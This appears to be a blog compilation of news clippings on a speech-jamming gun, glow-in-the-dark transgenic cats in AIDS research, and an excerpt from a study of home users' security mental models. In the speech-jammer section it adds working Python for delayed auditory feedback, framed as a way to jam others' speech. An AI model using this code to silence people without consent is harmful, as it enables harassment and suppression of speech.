SILENCE ENFORCEMENT DEVICE
http://www.extremetech.com/computing/120583-new-speech-jamming-gun-hints-at-dystopian-big-brother-future

Japanese researchers have created a hand-held gun that can jam the words of speakers up to 30 meters (100 ft) away. The gun has two purposes, according to the researchers: At its most basic, this gun could be used in libraries and other quiet spaces to stop people from speaking — but its second application is a lot more chilling.

The researchers were looking for a way to stop “louder, stronger” voices from saying more than their fair share in conversation. The paper reads: “We have to establish and obey rules for proper turn-taking when speaking. However, some people tend to lengthen their turns or deliberately interrupt other people when it is their turn in order to establish their presence rather than achieve more fruitful discussions. Furthermore, some people tend to jeer at speakers to invalidate their speech.” In other words, this speech-jamming gun was built to enforce “proper” conversations.

The gun works by listening in with a directional microphone, and then, after a short delay of around 0.2 seconds, playing it back with a directional speaker. This triggers an effect that psychologists call Delayed Auditory Feedback (DAF), which has long been known to interrupt your speech (you might’ve experienced the same effect if you’ve ever heard your own voice echoing through Skype or another voice comms program). According to the researchers, DAF doesn’t cause physical discomfort, but the fact that you’re unable to talk is obviously quite stressful.
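The mechanism is simple enough to prototype in software: capture microphone input, hold it in a short buffer, and play it back about a fifth of a second later. Below is a minimal illustrative sketch, not the researchers' code; it assumes the third-party Python sounddevice library and an ordinary full-duplex sound card rather than the directional hardware the gun uses.

# Minimal delayed-auditory-feedback (DAF) sketch. Illustrative only --
# not the SpeechJammer code. Assumes the `sounddevice` library
# (PortAudio bindings) and a standard full-duplex sound card.
import numpy as np
import sounddevice as sd

SAMPLE_RATE = 16_000     # Hz
DELAY_SECONDS = 0.2      # ~200 ms, the delay reported for the device
delay_samples = int(SAMPLE_RATE * DELAY_SECONDS)

ring = np.zeros(delay_samples, dtype=np.float32)  # last 0.2 s of input
write_pos = 0

def callback(indata, outdata, frames, time, status):
    """Echo microphone audio back, delayed by DELAY_SECONDS."""
    global write_pos
    mono = indata[:, 0]
    for i in range(frames):
        outdata[i, 0] = ring[write_pos]   # sample captured 0.2 s ago
        ring[write_pos] = mono[i]         # overwrite with the fresh sample
        write_pos = (write_pos + 1) % delay_samples

with sd.Stream(samplerate=SAMPLE_RATE, blocksize=256, channels=1,
               dtype="float32", callback=callback):
    print("Speak; your own voice comes back ~200 ms late.")
    sd.sleep(30_000)  # run for 30 seconds

Run this with a live speaker instead of headphones and you get a crude, omnidirectional version of the effect; the gun's contribution is aiming it at someone else with directional hardware.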

Suffice it to say, if you’re a firm believer in free speech, you should now be experiencing a deafening cacophony of alarm bells. Let me illustrate a few examples of how this speech-jamming gun could be used. At a political rally, an audience member could completely prevent Santorum, Romney, Paul, or Obama from speaking. On the flip side, a totalitarian state could point the speech jammers at the audience to shut them up. Likewise, when a celebrity or public figure appears on a live TV show, his contract could read “the audience must be silenced with speech jammers.”

Then there’s Harrison Bergeron, one of my favorite short stories by Kurt Vonnegut. In the story’s dystopian universe, everyone wears “handicaps” to ensure perfect social equality. Strong people must lug around heavy weights, beautiful people must wear masks, and intelligent people must wear headphones that play a huge blast of sound every few seconds, interrupting their thoughts. The more intelligent the person, the more frequent the blasts.

Back here in our universe, it’s not hard to imagine a future where we are outfitted with a variety of implanted electronics or full-blown bionic organs. Just last week we wrote about Google’s upcoming augmented-reality glasses, which will obviously have built-in earbuds. Late last year we covered bionic eyes that can communicate directly with the brain, and bionic ears and noses can’t be far off.

In short, imagine if a runaway mega-corporation or government gains control of these earbuds. Not only could the intelligence-destroying blasts from Harrison Bergeron come to pass, but with Delayed Auditory Feedback it would be possible to render the entire population mute. Well, actually, that’s a lie: Apparently DAF doesn’t work with utterances like “ahhh!” or “boooo!” or other non-wordy constructs. So, basically, we’d all be reduced to communicating with grunts and gestures.

SPEECH-JAMMING
http://www.technologyreview.com/blog/arxiv/27620/
How to Build a Speech-Jamming Gun
Japanese researchers build a gun capable of stopping speakers in mid-sentence / 03/01/2012

The drone of speakers who won’t stop is an inevitable experience at conferences, meetings, cinemas, and public libraries. Today, Kazutaka Kurihara at the National Institute of Advanced Industrial Science and Technology in Tsukuba and Koji Tsukada at Ochanomizu University, both in Japan, present a radical solution: a speech-jamming device that forces recalcitrant speakers into submission.

The idea is simple. Psychologists have known for some years that it is almost impossible to speak when your words are replayed to you with a delay of a fraction of a second. Kurihara and Tsukada have simply built a handheld device consisting of a microphone and a speaker that does just that: it records a person’s voice and replays it to them with a delay of about 0.2 seconds. The microphone and speaker are directional so the device can be aimed at a speaker from a distance, like a gun.

In tests, Kurihara and Tsukada say their speech-jamming gun works well: “The system can disturb remote people’s speech without any physical discomfort.” Their tests also identify some curious phenomena. They say the gun is more effective when the delay varies in time and more effective against speech that involves reading aloud than against spontaneous monologue.

Kurihara and Tsukada make no claims about the commercial potential of their device but list various applications. They say it could be used to maintain silence in public libraries and to “facilitate discussion” in group meetings. “We have to establish and obey rules for proper turn-taking when speaking,” they say. That has important implications. “There are still many cases in which the negative aspects of speech become a barrier to the peaceful resolution of conflicts,” they point out.

CONTACT
Kazutaka Kurihara
http://sites.google.com/site/qurihara/top-english
email : k-kurihara [ at ] aist.go.jp

Koji Tsukada
http://mobiquitous.com/index-e.html
email : tsuka [at] mobiquitous [dot] com

ABSTRACT
http://arxiv.org/abs/1202.6106
SpeechJammer: A System Utilizing Artificial Speech Disturbance with Delayed Auditory Feedback
by Kazutaka Kurihara and Koji Tsukada / 28 Feb 2012

“In this paper we report on a system, ‘SpeechJammer’, which can be used to disturb people’s speech. In general, human speech is jammed by giving back to the speakers their own utterances at a delay of a few hundred milliseconds. This effect can disturb people without any physical discomfort, and disappears immediately when the speaker stops speaking. Furthermore, this effect does not involve anyone but the speaker. We utilized this phenomenon and implemented two prototype versions by combining a direction-sensitive microphone and a direction-sensitive speaker, enabling the speech of a specific person to be disturbed. We discuss practical application scenarios of the system, such as facilitating and controlling discussions. Finally, we argue which system parameters should be examined in detail in future formal studies, based on the lessons learned from our preliminary study.”

SPEECHJAMMER
http://www.wired.com/underwire/2012/03/japanese-speech-jamming-gun/

Two Japanese researchers recently introduced a prototype for a device they call a SpeechJammer that can literally “jam” someone’s voice — effectively stopping them from talking. Now they’ve released a video of the device in action. “We have to establish and obey rules for proper turn-taking,” write Kazutaka Kurihara and Koji Tsukada in their article on the SpeechJammer (PDF). “However, some people tend to lengthen their turns or deliberately disrupt other people when it is their turn … rather than achieve more fruitful discussions.”

The researchers released the video after their paper went viral Thursday, to the authors’ apparent surprise. “Do you know why our project is suddenly becoming hot now?” asked Kurihara, a research scientist at the National Institute of Advanced Industrial Science and Technology in Tsukuba, in an e-mail exchange with Wired.com. (Kurihara’s partner Tsukada is an assistant professor at Ochanomizu University in Tokyo.)

The design of the SpeechJammer is deceptively simple. It consists of a direction-sensitive microphone and a direction-sensitive speaker, a motherboard, a distance sensor and some relatively straightforward code. The concept is simple, too — it operates on the well-studied principle of delayed auditory feedback. By playing a person’s voice back to them at a slight delay (around 200 milliseconds), you can jam their speech.
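The article doesn’t explain what the distance sensor contributes, but one plausible role (an assumption here, not a detail from the paper) is compensating for the time sound spends in flight: the target’s voice takes distance/c to reach the microphone, and the replayed audio takes another distance/c to travel back, so at long range the acoustic round trip eats most of the 200-millisecond budget. A back-of-the-envelope sketch in Python, with the function name and default value purely illustrative:

# Hypothetical sketch of distance compensation -- an assumption about the
# sensor's purpose, not the authors' published design.
SPEED_OF_SOUND = 343.0  # m/s in air at roughly 20 degrees C

def playback_delay(target_distance_m: float, desired_daf_s: float = 0.2) -> float:
    """Internal delay to apply so the *perceived* delay is desired_daf_s.

    The acoustic round trip (voice in, jammed audio out) already
    contributes 2 * distance / c of delay before the device adds any.
    """
    round_trip = 2.0 * target_distance_m / SPEED_OF_SOUND
    return max(0.0, desired_daf_s - round_trip)

# At 30 m the round trip alone is ~175 ms, leaving only ~25 ms to add:
print(f"{playback_delay(30.0) * 1000:.0f} ms")  # -> 25 ms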

Sonic devices have popped up in pop culture in the past. In sci-fi author J.G. Ballard’s short story “The Sound-Sweep,” published in 1960, a vacuum cleaner called a “sonovac” sweeps up the debris of old sounds. The wily German composer Karlheinz Stockhausen had plans for a “sound swallower,” which would cancel unwanted sounds in the environment using the acoustic principle of destructive interference. And in the 1984 German film Decoder, special yellow cassette tapes play “anti-Muzak” that destroys the lulling tones of Muzak, prompting diners at a fast-food restaurant to throw up en masse and start rioting.

But instead of sci-fi, the Japanese researchers behind the SpeechJammer looked to medical devices used to help people with speech problems. Delayed auditory feedback, or DAF, devices have been used to help stutterers for decades. If a stutterer hears his own voice at a slight delay, stuttering often improves. But if a non-stutterer uses a DAF device designed to help stutterers, he can start stuttering — and the effect is more pronounced if the delay is longer, up to a certain point.

“We utilized DAF to develop a device that can jam remote physically unimpaired people’s speech whether they want it or not,” write the researchers. “[The] device possesses one characteristic that is different from the usual medical DAF device; namely, the microphone and speaker are located distant from the target.”

Being at a distance from the target means it’s possible to aim the device at people who are several feet away — sort of like a TV B-Gone, but for people. Bothered by what someone at a meeting is saying? Point the SpeechJammer at him. Can’t stand your nattering in-laws? Time for the SpeechJammer. In the wrong hands — criminals, for instance, or repressive governments — the device could have potentially sinister applications. For now, it remains a prototype.

INSPIRATION
http://www.wired.com/underwire/2012/03/speech-jamming-gun-inspiration/

“One day I just came by a science museum and enjoyed a demonstration about Delayed Auditory Feedback (DAF) at [the] cognitive science corner,” says Kurihara. “When I spoke to a microphone, my voice came back to me after a few hundred millisecond delay. Then, I could not continue to speak any more. That’s fun!”

Kurihara soon realized his adventures in the science museum could be applicable to other fields. He was already interested in developing a system that “controls appropriate turn-taking at discussions.” The science museum visit was his “aha!” moment. “Then I came up with the gun-type SpeechJammer idea utilizing DAF,” says Kurihara. “That’s the destiny.”

Kurihara enlisted the talents of Koji Tsukada, an assistant professor at Tokyo’s Ochanomizu University whom he calls “the gadget master.” Tsukada has been involved in a number of strange and intriguing projects, including the LunchCommunicator, a “lunchbox-type device which supports communication between family members”; the SmartMakeupSystem, which “helps users find new makeup methods for use with their daily cosmetics”; and the EaTheremin, a “fork-type instrument that enables users to play various sounds by eating foods”.

Tsukada introduced Kurihara to a parametric speaker kit, which they could use to convey sound in a very direction-sensitive way. “After I explained him my idea, he soon agreed to join my project,” says Kurihara. “It was a marriage between science and gadgets!”

As for SpeechJammer’s potentially sinister uses? “We hope SpeechJammer is used for building the peaceful world,” says Kurihara. The world can only hope.


FELINE AIDS RESEARCH
http://www.guardian.co.uk/science/2011/sep/11/genetically-modified-glowing-cats
Glow cat: fluorescent green felines could help study of HIV
Scientists hope cloning technique that produced genetically modified cats will aid human and feline medical research
by Alok Jha / 11 September 2011

It is a rite of passage for any sufficiently advanced genetically modified animal: at some point scientists will insert a gene that makes you glow green. The latest addition to this ever-growing list – which includes fruit flies, mice, rabbits and pigs – is the domestic cat. US researcher Eric Poeschla has produced three glowing GM cats by using a virus to carry the gene for green fluorescent protein (GFP) into the eggs from which the animals eventually grew. This method of genetic modification is simpler and more efficient than traditional cloning techniques, and results in fewer animals being needed in the process. The GFP gene, which has its origins in jellyfish, expresses proteins that fluoresce when illuminated with certain frequencies of light. This function is regularly used by scientists to monitor the activity of individual genes or cells in a wide variety of animals. The development and refinement of the GFP technique earned its scientific pioneers the Nobel prize for chemistry in 2008. Poeschla, of the Mayo Clinic in Rochester, Minnesota, reported his results in the journal Nature Methods.

In the case of the glowing cats, the scientists hope to use the GM animals in the study of HIV/Aids. “Cats are susceptible to feline immunodeficiency virus [FIV], a close relative of HIV, the cause of Aids,” said professors Helen Sang and Bruce Whitelaw of the Roslin Institute at the University of Edinburgh, where scientists cloned Dolly the sheep in 1996. “The application of the new technology suggested in this paper is to develop the use of genetically-modified cats for the study of FIV, providing valuable information for the study of Aids. This is potentially valuable but the uses of genetically modified cats as models for human diseases are likely to be limited and only justified if other models – for example in more commonly used laboratory animals, like mice and rats – are not suitable.” Dr Robin Lovell-Badge, head of developmental genetics at the Medical Research Council’s national institute for medical research, said: “Cats are one of the few animal species that are normally susceptible to such viruses, and indeed they are subject to a pandemic, with symptoms as devastating to cats as they are to humans. Understanding how to confer resistance is … of equal importance to cat health and human health.”

THAT GLOW GREEN
http://www.newscientist.com/article/dn20896-glowing-transgenic-cats-could-boost-aids-research.html?DCMP=OTC-rss&nsref=online-news
Glowing transgenic cats could boost AIDS research
by Andy Coghlan / 11 September 2011

Three cats genetically modified to resist feline immunodeficiency virus (FIV) have opened up new avenues for AIDS research. The research could also help veterinarians combat the virus, which kills millions of feral cats each year and also infects big cats, including lions. Prosaically named TgCat1, TgCat2 and TgCat3, the GM cats – now a year old – glow ghostly green under ultraviolet light because they have been given the green fluorescent protein (GFP) gene originating from jellyfish. The GM cats also carry an extra monkey gene, called TRIMCyp, which protects rhesus macaques from infection by FIV, the virus responsible for cat AIDS. By giving the gene to the cats, the team hopes to offer the animals protection from FIV. Their study could help researchers develop and test similar approaches to protecting humans from infection with HIV.

Cat immunity
Already, the researchers have demonstrated that lab cultures of white blood cells from the cats are protected from FIV, and they hope to give the virus to the cats to check whether they are immune to it. “The animals clearly have the protective gene expressed in all their tissues including the lymph nodes, thymus and spleen,” says Eric Poeschla of the Mayo Clinic College of Medicine in Rochester, Minnesota, who led the research. “That’s crucial because that’s where the disease really happens, and where you see destruction of T-cells targeted by HIV in humans.” The animals are not the first GM cats, but the new method is far more efficient and versatile than previous techniques. The first cloned cat, born in 2001, was the only one to survive from 200 embryos, each created by taking an ear cell from cats, removing the nucleus and fusing it with a cat egg cell emptied of its own nucleus. Poeschla’s technique is far more direct, far more efficient and far simpler, and has already been used successfully to make GM mice, pigs, cows and monkeys. He loads genes of interest into a lentivirus, which he then introduces directly into a cat oocyte, or egg cell. The oocyte loaded with the new genes is then fertilised and placed in the womb of a foster mother. From 22 implantations, Poeschla achieved 12 fetuses in five pregnancies, and three live births. And out of the 12 fetuses, 11 successfully incorporated the new genes, demonstrating how efficient the method is. One surviving male kitten, TgCat1, has already mated with three normal females, siring eight healthy kittens that all carry the implanted genes as well, showing that they are inheritable. But there are doubts about whether cats will replace monkeys as the staples of HIV research. “It’s fantastic they’ve created GM cats,” says Theodora Hatziioannou of the Aaron Diamond AIDS Research Center in New York City. “But what makes research in monkeys so much better is that SIV in monkeys is much more closely related to HIV, so it’s more straightforward to draw conclusions than it would be with FIV.”

 

THAT GLOW RED
http://news.nationalgeographic.com/news/2009/05/photogalleries/glowing-animal-pictures#/cats-cloned-glowing-animals_11832_600x450.jpg
May 14, 2009 / Photo by Choi Byung-kil/Yonhap via AP

How does it glow?
Red fluorescent protein, introduced via a virus into cloned DNA, which was implanted in cat eggs, then implanted in the mother (2007)

What can we learn?
Scientists at Gyeongsang National University in South Korea both cloned a Turkish Angora house cat and made it fluorescent—as shown in the glowing cat (left) photographed in a dark room under ultraviolet light. (The nonfluorescent cat, at right, appears green in these conditions.) The scientists weren’t the first to clone a cat – they weren’t even the first to clone a fluorescent cat. But they were the first to clone a cat that fluoresces red. It’s hoped that the red glow, which appears in every organ of the cats, will improve the study of genetic diseases.


CONTACT
Eric Poeschla
http://mayoresearch.mayo.edu/mayo/research/poeschla/
http://mayoresearch.mayo.edu/staff/poeschla_em.cfm
email : Poeschla.Eric [at] mayo [dot] edu

PRESS RELEASE
http://www.nature.com/nmeth/journal/vaop/ncurrent/full/nmeth.1703.html
http://www.mayoclinic.org/news2011-rst/6434.html
Mayo Clinic Teams with Glowing Cats Against AIDS, Other Diseases
New Technique Gives Cats Protection Genes / September 11, 2011

Mayo Clinic researchers have developed a genome-based immunization strategy to fight feline AIDS and illuminate ways to combat human HIV/AIDS and other diseases. The goal is to create cats with intrinsic immunity to the feline AIDS virus. The findings — called fascinating and landmark by one reviewer — appear in the current online issue of Nature Methods. Feline immunodeficiency virus (FIV) causes AIDS in cats as the human immunodeficiency virus (HIV) does in people: by depleting the body’s infection-fighting T-cells. The feline and human versions of key proteins that potently defend mammals against virus invasion — termed restriction factors — are ineffective against FIV and HIV respectively. The Mayo team of physicians, virologists, veterinarians and gene therapy researchers, along with collaborators in Japan, sought to mimic the way evolution normally gives rise over vast time spans to protective protein versions. They devised a way to insert effective monkey versions of them into the cat genome. “One of the best things about this biomedical research is that it is aimed at benefiting both human and feline health,” says Eric Poeschla, M.D., Mayo molecular biologist and leader of the international study. “It can help cats as much as people.”

Dr. Poeschla treats patients with HIV and researches how the virus replicates. HIV/AIDS has killed over 30 million people and left countless children orphaned, with no effective vaccine on the horizon. Less well known is that millions of cats also suffer and die from FIV/AIDS each year. Since the project concerns ways introduced genes can protect species against viruses, the knowledge and technology it produces might eventually assist conservation of wild feline species, all 36 of which are endangered. The technique is called gamete-targeted lentiviral transgenesis — essentially, inserting genes into feline oocytes (eggs) before sperm fertilization. Succeeding with it for the first time in a carnivore, the team inserted a gene for a rhesus macaque restriction factor known to block cell infection by FIV, as well as a jellyfish gene for tracking purposes. The latter makes the offspring cats glow green.

The macaque restriction factor, TRIMCyp, blocks FIV by attacking and disabling the virus’s outer shield as it tries to invade a cell. The researchers know that works well in a culture dish and want to determine how it will work in vivo. This specific transgenesis (genome modification) approach will not be used directly for treating people with HIV or cats with FIV, but it will help medical and veterinary researchers understand how restriction factors can be used to advance gene therapy for AIDS caused by either virus. The method for inserting genes into the feline genome is highly efficient, so that virtually all offspring have the genes. And the defense proteins are made throughout the cat’s body. The cats with the protective genes are thriving and have produced kittens whose cells make the proteins, thus proving that the inserted genes remain active in successive generations.

The other researchers are Pimprapar Wongsrikeao, D.V.M., Ph.D.; Dyana Saenz, Ph.D.; and Tommy Rinkoski, all of Mayo Clinic; and Takeshige Otoi, Ph.D., of Yamaguchi University, Japan. The research was supported by Mayo Clinic and the Helen C. Levitt Foundation. Grants from the National Institutes of Health supported key prior technology developments in the laboratory.


A ‘glow in the dark’ kitten viewed under a special blue light, next to a non-modified cat. Both cats’ fur looks the same under regular light. {Photograph: Mayo Clinic}

FOLK MODELS of HOME COMPUTER SECURITY
http://www.schneier.com/blog/archives/2011/03/folk_models_in.html
http://www.rickwash.com/papers/rwash-dissertation-final.pdf
http://www.rickwash.com/papers/rwash-homesec-soups10-final.pdf
by Rick Wash / at SOUPS (Symposium on Usable Privacy and Security)

Home computer systems are insecure because they are administered by untrained users. The rise of botnets has amplified this problem; attackers compromise these computers, aggregate them, and use the resulting network to attack third parties. Despite a large security industry that provides software and advice, home computer users remain vulnerable. I identify eight ‘folk models’ of security threats that are used by home computer users to decide what security software to use, and which expert security advice to follow: four conceptualizations of ‘viruses’ and other malware, and four conceptualizations of ‘hackers’ that break into computers. I illustrate how these models are used to justify ignoring expert security advice. Finally, I describe one reason why botnets are so difficult to eliminate: they cleverly take advantage of gaps in these models so that many home computer users do not take steps to protect against them.

1. INTRODUCTION
Home users are installing paid and free home security software at a rapidly increasing rate.{1} These systems include anti-virus software, anti-spyware software, personal firewall software, personal intrusion detection / prevention systems, computer login / password / fingerprint systems, and intrusion recovery software. Nonetheless, security intrusions and the costs they impose on other network users are also increasing. One possibility is that home users are starting to become well-informed about security risks, and that soon enough of them will protect their systems that the problem will resolve itself. However, given the “arms race” history in most other areas of networked security (with intruders becoming increasingly sophisticated and numerous over time), it is likely that the lack of user sophistication and non-compliance with recommended security system usage policies will continue to limit home computer security effectiveness.

To design better security technologies, it helps to understand how users make security decisions, and to characterize the security problems that result from those decisions. To this end, I have conducted a qualitative study to understand users’ mental models [18, 11] of attackers and security technologies. A mental model describes how a user thinks about a problem; it is the model in the person’s mind of how things work. People use these models to make decisions about the effects of various actions [17]. In particular, I investigate the existence of folk models for home computer users. Folk models are mental models that are not necessarily accurate in the real world, thus leading to erroneous decision making, but are shared among similar members of a culture [11]. It is well known that in technological contexts users often operate with incorrect folk models [1]. To understand the rationale for home users’ behavior, it is important to understand the decision model that people use. If technology is designed on the assumption that users have correct mental models of security threats and security systems, it will not induce the desired behavior when users are in fact making choices according to a different model. As an example, Kempton [19] studied folk models of thermostat technology in an attempt to understand the wasted energy that stems from poor choices in home heating. He found that his respondents possessed one of two mental models for how a thermostat works. Both models can lead to poor decisions, and both models can lead to correct decisions that the other model gets wrong. Kempton concludes that “Technical experts will evaluate folk theory from this perspective [correctness] – not by asking whether it fulfills the needs of the folk. But it is the latter criterion […] on which sound public policy must be based.” The same argument holds for technology design: whether the folk models are correct or not, technology should be designed to work well with the folk models actually employed by users.{2}

For home computer security, I study two related research questions: 1) Potential threats: How do home computer users conceptualize the information security threats that they face? 2) Security responses: How do home computer users apply their mental models of security threats to make security-relevant decisions? Despite my focus on “home computer users,” many of these problems extend beyond the home; most of my analysis and understanding in this paper is likely to generalize to a whole class of users who are unsophisticated in their security decisions. This includes many university computers, computers in small businesses that lack IT support, and personal computers used for business purposes.

{1} Despite a worldwide recession, the computer security industry grew 18.6% in 2008, totaling over $13 billion, according to a recent Gartner report [9].
{2} It may be that users can be re-educated to use more correct mental models, but generally it is more difficult to re-educate.



1.1 Understanding Security
Managing the security of a computer system is very difficult. Ross Anderson’s [2] study of Automated Teller Machine (ATM) fraud found that the majority of the fraud committed using these machines was not due to technical flaws, but to errors in deployment and management failures. These problems illustrate the difficulty that even professionals face in producing effective security. The vast majority of home computers are administered by people who have little security knowledge or training.

Existing research has investigated how non-expert users deal with security and network administration in a home environment. Dourish et al. [12] conducted a related study, inquiring not into mental models but into how corporate knowledge workers handled security issues. Gross and Rosson [15] also studied what security knowledge end users possess in the context of large organizations. And Grinter et al. [14] interviewed home network users about their network administration practices. Combining the results from these papers, it appears that many users exert much effort to avoid security decisions. All three papers report that users often find ways to delegate the responsibility for security to some external entity; this entity could be technological (like a firewall), social (another person or IT staff), or institutional (like a bank). Users do this because they feel they don’t have the skills to maintain proper security. However, despite this delegation of responsibility, many users still make numerous security-related decisions on a regular basis. These papers do not explain how those decisions get made; rather, they focus mostly on the anxiety these decisions create. I add structure to these observations by describing how folk models enable home computer users to make the security decisions they cannot delegate. I also focus on differences between people, and characterize different methods of dealing with security issues rather than trying to find general patterns. The folk models I describe may explain differences observed between users in these studies.

Camp [6] proposed using mental models as a framework for communicating complex security risks to the general populace. She did not study how people currently think about security, but proposed five possible models that may be useful. These models take the form of analogies or metaphors with other similar situations: physical security, medical risks, crime, warfare, and markets. Asgharpour et al. [3] built on this by conducting a card-sorting experiment that matches these analogies with the mental models of users. They found that experts and non-experts show sharp differences in which analogy their mental model is closest to. Camp et al. began by assuming a small set of analogies that they believe function as mental models. Rather than pre-defining the range of possible models, I treat these mental models as a legitimate area for inductive investigation, and endeavor to uncover users’ mental models in whatever form they take. This prior work confirms that the concept of mental models may be useful for home computer security, but made assumptions which may or may not be appropriate. I fill in the gap by inductively developing an understanding of just what mental models people actually possess. Also, given the vulnerability of home computers and the finding that experts and non-experts differ sharply [3], I focus solely on non-expert home computer users.

Herley [16] argues that non-expert users reject security advice because it is rational to do so. He believes that security experts provide advice that ignores the costs of the users’ time and effort, and therefore overestimates the net value of security. I agree, though I dig deeper into understanding how users actually make these security / effort tradeoffs.

1.2 Botnets and Home Computer Security
In the past, computers were targeted by hackers approximately in proportion to the amount of value stored on them or accessible from them. Computers that stored valuable information, such as bank computers, were a common target, while home computers were fairly innocuous. Recently, attackers have used a technique known as a ‘botnet,’ where they hack into a number of computers and install special ‘control’ software on those computers. The hacker can give a master control computer a single command, and it will be carried out by all of the compromised computers (called zombies) it is connected to [4, 5]. This technology enables crimes that require large numbers of computers, such as spam, click fraud, and distributed denial of service [26]. Observed botnets range in size from a couple hundred zombies to 50,000 or more zombies. As John Markoff of the New York Times observes, botnets are not technologically novel; rather, “what is new is the vastly escalating scale of the problem” [21]. Since any computer with an Internet connection can be an effective zombie, hackers have logically turned to attacking the most vulnerable population: home computers. Home computer users are usually untrained and have few technical skills. While some software has improved the average level of security of this class of computers, home computers still represent the largest population of vulnerable computers. When compromised, these computers are often used to commit crimes against third parties. The vulnerability of home computers is a security problem for many companies and individuals who are the victims of these crimes, even if their own computers are secure [7].

1.3 Methods
I conducted a qualitative inquiry into how home computer users understand and think about potential threats. To develop depth in my exploration of the folk models of security, I used an iterative methodology, as is common in qualitative research [24]. I conducted multiple rounds of interviews punctuated with periods of analysis and tentative conclusions. The first round of 23 semi-structured interviews was conducted in Summer 2007. Preliminary analysis proceeded throughout the academic year, and a second round of 10 interviews was conducted in Summer 2008, for a total of 33 respondents. This second round was more focused, and specifically searched for negative cases of earlier results [24]. Interviews averaged 45 minutes each; they were audio recorded and transcribed for analysis. Respondents were chosen from a snowball sample [20] of home computer users evenly divided among three Midwestern U.S. cities. I began with a few home computer users that I knew in these cities. I asked them to refer me to others in the area who might be information-rich informants. I screened these potential respondents to exclude people who had expertise or training in computers or computer security. From those not excluded, I purposefully selected respondents for maximum variation [20]: I chose respondents from a wide variety of backgrounds, ages, and socio-economic classes. Ages ranged from undergraduate (19 years old) up through retired (over 70). Socio-economic status was not explicitly measured, but ranged from a recently graduated artist living in a small efficiency apartment up to a successful executive who owns a large house overlooking the main river through town. Selecting for maximal variation allows me to document diverse variations in folk models and identify important common patterns [20]. After interviewing the chosen respondents, I grew my potential interview pool by asking them to refer me to more people with home computers who might provide useful information. This snowballing through recommendations ensured that the contacted respondents would be information-rich [20] and cooperative. These new potential respondents were also screened, selected, and interviewed. The method does not generate a sample that is representative of the population of home computer users. However, I don’t believe that the sample is a particularly special or unusual group; it is likely that there are other people like them in the larger population.

I developed an (IRB approved) face-to-face semi-structured interview protocol that pushes subjects to describe and use their mental models, based on formal methods presented by D’Andrade [11]. I specifically probed for past instances where the respondents would have had to use their mental model to make decisions, such as past instances of security problems, or efforts undertaken to protect their computers. By asking about instances where the model was applied to make decisions, I enabled the respondents to uncover beliefs that they might not have been consciously aware of. This also ensures that the respondents believe their model enough to base choices on it. The majority of each interview was spent on follow-up questions, probing deeper into the responses of the subject. This method allows me to describe specific, detailed mental models that my participants use to make security decisions, and to be confident that these are models that the participants actually believe.

My focus in the first round was broad and exploratory. I asked about any security-related problems the respondent had faced or was worried about; I also specifically asked about viruses, hackers, data loss, and data exposure (identity theft). I probed to discover what countermeasures the respondents used to mitigate these risks. Since this was a semi-structured interview, I followed up on many responses by probing for more information. After preliminary analysis of this data, I drew some tentative conclusions and listed points that needed clarification. To better elucidate these models and to look for negative cases, I conducted 10 second-round interviews using a new (IRB approved) interview protocol. In this round, I focused more on three specific threats that subjects face: viruses, hackers, and identity theft.

For this second round, I also used an additional interviewing technique: hypothetical scenarios. This technique was developed to help focus the respondents and elicit additional information not present in the first round of interviews. I presented the respondents with three hypothetical scenarios and asked the subjects for their reaction. The three scenarios correspond to each of the three main themes for the second round: finding out you have a virus, finding out a hacker has compromised your computer, and being informed that you are a victim of identity theft. For each scenario, after the initial description and respondent reaction, I added an additional piece of information that contradicted the mental models I discovered after the first round. For example, one preliminary finding from the first round was that people rarely talked about the creation of computer viruses; it was unclear how they would react to a computer virus that was created by people for a purpose. In the virus scenario, I informed the respondents that the virus in question was written by the Russian mafia. This detail was drawn from recent news linking the Russian mafia to widespread viruses such as Netsky, Bagle, and Storm.{3}

Once I had all of the data collected and transcribed, I conducted both inductive and deductive coding of the data to look both for predetermined and emergent themes [23]. I began with a short list of major themes I expected to see from my pilot interviews, such as information about viruses, hackers, identity theft, countermeasures, and sources of information. I identified and labeled (coded) instances when the respondents discussed these themes. I then expanded the list of codes as I noticed interesting themes and patterns emerging. Once all of the data was coded, I summarized the data on each topic by building a data matrix [23].{4} This data matrix helped me to identify basic patterns in the data across subjects, to check for representativeness, and to look for negative cases [24].

After building the initial summary matrices, I identified patterns in the way respondents talked about each topic, paying specific attention to word choices, metaphors employed, and explicit content of statements. Specifically, I looked for themes in which users differ in their opinions (negative case analysis). These themes became the building blocks for the mental models. I built a second matrix that matched subjects with these features of mental models.{5} This second matrix allowed me to identify and characterize the various mental models that I encountered. Table 7 in the Appendix shows which participants from Round 2 had each of the 8 models. A similar table was developed for the Round 1 participants. I then took the description of the model back to the data, verified whether the model description accurately represented the respondents’ descriptions, and looked for contradictory evidence and negative cases [24]. This allowed me to update the models with new information or insights garnered by following up on surprises and incorporating outliers. This was an iterative process; I continued updating model descriptions, looking for negative cases, and checking for representativeness until I felt that the model descriptions I had accurately represented the data. In this process, I developed further matrices as data visualizations, some of which appear in my descriptions below.

{3} http://www.linuxinsider.com/story/33127.html?wlc=1244817301
{4} A fragment of this matrix can be seen in Table 5 in the Appendix.
{5} A fragment of this matrix is Table 6 in the Appendix.

2. FOLK MODELS of SECURITY THREATS
I identified a number of different folk models in the data. Every folk model was shared by multiple respondents in this study. The purpose of qualitative research is not to generalize to a population; rather, it is to explore phenomena in depth. To avoid misleading readers, I do not report how many users possessed each folk model. Instead, I describe the full range of folk models I observed. I divide the folk models into two broad categories based on a distinction that most subjects possessed: 1) models about viruses, spyware, adware, and other forms of malware, which everyone referred to under the umbrella term ‘virus’; and 2) models about the attackers, referred to as ‘hackers,’ and the threat of ‘breaking in to’ a computer. Each respondent had at least one model from each of the two categories. For example, Nicole {6} believed that viruses were mischievous and that hackers were criminals who target big fish. These models are not necessarily mutually exclusive. For example, a few respondents talked about different types of hackers and would describe more than one folk model of hackers.

